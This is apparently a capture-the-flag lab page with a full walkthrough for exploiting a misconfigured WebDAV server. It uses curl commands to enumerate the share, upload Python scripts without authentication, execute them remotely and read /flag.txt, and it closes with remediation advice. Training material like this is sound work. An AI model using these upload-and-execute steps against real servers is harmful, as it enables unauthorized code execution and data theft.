
Labs / WebDAV Explorer

  • Daily Challenge
  • Released 25 Sep 2025

📁 Can you exploit the WebDAV server to access restricted files?

This corporate file server uses WebDAV for remote file management, but a misconfiguration in the access controls creates a dangerous security flaw. 📂 Many organizations rely on WebDAV for file sharing and collaboration, making it a common target for attackers seeking to upload malicious files or access sensitive data. Master this file server exploitation technique and discover how weak WebDAV configurations can lead to complete system compromise! 🎯

1 flag, 1 point, Pro Exclusive

📁 WebDAV Explorer - Complete Solution

Objective: Exploit WebDAV server misconfigurations to upload Python files and achieve remote code execution to access the system flag.
🔍 Step 1: WebDAV Discovery

Test whether the server speaks WebDAV by sending an HTTP OPTIONS request and inspecting the response headers:

curl -X OPTIONS http:/// -v

A WebDAV-enabled server answers with a DAV header (for example DAV: 1,2, the RFC 4918 compliance classes) and lists the WebDAV methods in the Allow header: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, PUT. Servers do not always advertise PUT on the root, so the absence of PUT here is not conclusive; Step 3 tests it directly.

🔍 Step 2: Directory Enumeration

Use the PROPFIND method to list the collection, passing Depth: 1 so the server returns the immediate children (many servers refuse an unbounded Depth: infinity listing):

curl -X PROPFIND -H "Depth: 1" http:///webdav/

A 207 Multi-Status response carries an XML body with one <D:response> element per entry; each <D:href> is the path of a file or sub-collection, which reveals the WebDAV directory structure with its existing files and folders.

🔍 Step 3: File Upload Testing

Test file upload capability using the PUT method:

curl -X PUT http:///webdav/test.txt -d "Hello WebDAV"

A 201 Created response (or 204 No Content when an existing file is overwritten) shows that the server accepts unauthenticated uploads via WebDAV; a 401, 403 or 405 means writes are restricted at this path.

🔍 Step 4: Python File Upload

Upload a Python script to test code execution:

curl -X PUT http:///webdav/test.py -d "import os; print('Current directory:', os.getcwd())"

🔍 Step 5: Code Execution Discovery

Access the uploaded Python file to test execution:

curl http:///webdav/test.py

If the server executes Python files, you'll see the script output (the interpreter's working directory) instead of the source code. If the source text comes back unchanged, the server is only serving the file as static content: the unauthenticated upload is still a finding, but not remote code execution. A script that does run executes with the privileges of the web server process, which is what the flag read in the next step relies on.

🔍 Step 6: Flag Extraction

Upload a Python script to read the system flag:

curl -X PUT http:///webdav/getflag.py -d "import os; print(open('/flag.txt').read())"

🔍 Step 7: Execute Flag Script

Access the flag extraction script to retrieve the flag:

curl http:///webdav/getflag.py

The server executes the Python code and returns the contents of /flag.txt. Clean up the uploaded test scripts afterwards so they cannot serve as a foothold for anyone else who finds the share.

🛡️ Security Implications

This lab chains two misconfigurations: the WebDAV share accepts unauthenticated PUT requests, and the same directory is mapped to a handler that executes .py files on request. Either alone is a finding; together they turn a file upload into remote code execution as the web server user, and from there into complete system compromise. The fix is to require authentication for the write methods (PUT, MKCOL, COPY, MOVE, PROPPATCH, DELETE) and never to serve a writable WebDAV tree through an executable handler: uploaded content should live where the server only ever reads it back as static data.